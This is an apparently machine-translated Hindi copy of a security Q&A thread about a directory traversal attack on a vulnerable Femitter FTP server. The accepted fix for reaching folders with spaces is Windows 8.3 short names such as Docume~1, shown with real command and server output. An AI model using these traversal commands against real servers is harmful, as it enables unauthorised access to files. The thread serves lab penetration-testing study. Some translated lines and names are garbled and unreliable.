सफ़ेद रिक्त स्थान वाले निर्देशिकाओं पर FTP निर्देशिका ट्रैवर्सल हमला

15

मैं एक बंद संदर्भ वातावरण में एक स्वीकृत कीट का संचालन कर रहा हूं, और एक साधारण मुद्दे पर संघर्ष कर रहा हूं, मैं वर्तमान में हल नहीं कर सकता।

जब MS Windows OS पर चलने वाले एक कमजोर Fermitter FTP सर्वर के खिलाफ डायरेक्टरी ट्रैवर्सल हमले को अंजाम देने का प्रयास किया जाता है, तो सिस्टम रूट (केवल संदर्भ के लिए यहां बदली गई सामग्री और लिस्ट) पर LIST करना संभव है:

# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root): 
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp            0 Sep 23  2015 AUTOEXEC.BAT
-rw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 CONFIG.SYS
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Documents and Settings
dr--r--r--   1 ftp      ftp            0 Sep 23  2015 Program Files
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 WINDOWS
226 File sent ok

हालाँकि, यदि मैं एक फ़ोल्डर की सामग्री को सफेद रिक्त स्थान के साथ सूचीबद्ध करना चाहता Documents and settingsहूँ जैसे कि , मैं गोरे स्थानों को अनदेखा करने के कारण निर्देशिका सामग्री को सूचीबद्ध नहीं कर पा रहा हूँ।

ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok

मैंने पहले से ही अलग-अलग एफ़टीपी क्लाइंट (सीएलआई और जीयूआई, लिनक्स और विंडोज पर) का उपयोग करने की कोशिश की और या तो वे सफेद रिक्त स्थान को अनदेखा करते हैं या निर्देशिका ट्रैवर्स को अस्वीकार करते हैं।

साथ ही पहले कच्चे सॉकेट्स और फिर ftplib का उपयोग करके पायथन पर हमले की पटकथा को एफएक्स सर्वर पर सीधे एचईएक्स प्रारूप में भेजने के लिए प्रयास किया, लेकिन कोई सफलता नहीं मिली।

कुछ घंटों के लिए गुगली करने से काम का हल नहीं निकलता था (हां, बहुत सारे विकल्प थे, जो काम नहीं करते थे), यही वजह है कि यहां कोई है, जिसके पास एक ही मुद्दा है। बहुत यकीन है, कि यह पहली बार नहीं है जब व्हाइट स्पेस के साथ इस तरह के डायरेक्टरी ट्रैवर्सल की जरूरत है।

ftp  attack-vector 
लोक आयूत
स्रोत
एफ़टीपी क्लाइंट्स के लिए केस सेंसिटिविटी अप्रासंगिक लगती है। कम से कम GNU / लिनक्स एफ़टीपी ग्राहक पत्र मामले की अनदेखी करने वाली निर्देशिकाओं को सूचीबद्ध करता है।
@ लॉकआउट: केस सेंसिटिविटी एक सर्वर साइड चीज है न कि क्लाइंट चीज। क्लाइंट डेटा को उसी तरह सूचीबद्ध करता है जिस तरह से सर्वर उसे भेजता है और केस को बदलता नहीं है।
स्टीफन उलरिच
1
C: \ Docume ~ 1 \ a आज़ भी दें।
डॉग बिल्ली की दुनिया
1
साथ रिक्त स्थान से बचने की कोशिश करें \या निर्देशिका स्ट्रिंग के हवाले से
DavidPostill
1
मुझे खुशी है कि इसने आपके लिए @lockout का काम किया। चूंकि आप अपने प्रश्न का उत्तर देने की परेशानी से गुज़रे हैं, यह मेरे द्वारा ठीक है कि आप इसे उत्तर के रूप में स्वीकार करते हैं। मुझे श्रेय देने के लिए धन्यवाद।
कुत्ता बिल्ली की दुनिया खा जाता है

जवाबों:

16

MS विंडोज डायरेक्टरी का उपयोग करने के लिए @Dogeatcatworld द्वारा सुझाए गए समाधान जैसे कि लघु संकेतन C:\Docume~1\

ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
drw-rw-rw-   1 ftp      ftp            0 Sep 26  2015 Administrateur
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 All Users
226 File sent ok

एमएस नॉलेज बेस से वास्तव में अच्छा लेख 8.3 डायरेक्टरी नोटेशन की व्याख्या करता है: विंडोज लंबी फाइल नामों से 8.3 फ़ाइल नाम कैसे उत्पन्न करता है

लोक आयूत
स्रोत
2
OSCP मैं देख रहा हूँ। शॉर्ट टिप के लिए अपने टिप को जोड़ने के लिए, जैसे "ऑल यूज़र्स", स्पेस को ड्रॉप करें और "AllUse ~ 1" का उपयोग करें। क्या आपने इंटरएक्टिव ब्राउज़ करने के लिए एफ़टीपी को माउंट करने का एक तरीका खोजा, या क्या आपने फ़ाइलों को एक-एक करके डाउनलोड करना समाप्त कर दिया।
n00b
1

"संक्षिप्त नाम" वास्तव में पुराना DOS 8.3 नामकरण सम्मेलन है, इसलिए सभी निर्देशिकाओं में पहले 6 अक्षर होंगे जिसके बाद ~ 1 यह मानते हुए कि केवल एक ही नाम है जो मेल खाता है, उदाहरण के लिए:

C: \ ABCDEF ~ 1 - C: \ ABCDEFG I AM DIRECTORY
C: \ BCDEFG ~ 1 - C: \ BCDEFGHIJKL M एक और निर्देशिका

यहाँ एकमात्र अपवाद है:

C: \ ABCDEF ~ 1 - C: \ ABCDEFG I AM DIRECTORY
C: \ ABCDEF ~ 2 - C: \ ABCDEFGHI निर्देशिका

स्रोत: मैं विंडोज डायरेक्टरी / फाइल का छोटा रास्ता कैसे खोज सकता हूं?

madsport
स्रोत
0

Ftp url एन्कोडिंग का उपयोग नहीं करता है, इसलिए% xx तब तक काम नहीं करेगा जब तक कि आप किसी ब्राउज़र में ftp का उपयोग नहीं कर रहे हैं जो आपके लिए इसका अनुवाद कर सकता है।

इसके बजाय इसके चारों ओर उद्धरणों का उपयोग करने का प्रयास करें, जैसे: ls "../../some dir"

wireghoul
स्रोत
1
HI, यदि आप निर्देशिका ट्रैवर्सल के लिए किए गए प्रयासों को देखते हैं, तो आप देखेंगे कि मैंने कई उद्धरणों का प्रयास किया है: एकल उद्धरण, डबल उद्धरण और बैक टिक। उन्होंने काम नहीं किया, जैसा कि एफ़टीपी आउटपुट लिस्टिंग में दर्शाया गया है। % 20 का उपयोग करना सिर्फ यह प्रयोग करना था कि क्या काम करेगा, क्योंकि सभी विकल्पों की कोशिश करने के लिए बेताब हैं। निश्चित रूप से% एन्कोडिंग ब्राउज़रों और एफ़टीपी ग्राहकों की व्याख्या करने में सक्षम काम करता है।
तालाबंदी
हमारी साइट का प्रयोग करके, आप स्वीकार करते हैं कि आपने हमारी Cookie Policy और निजता नीति को पढ़ और समझा लिया है।
Licensed under cc by-sa 3.0 with attribution required.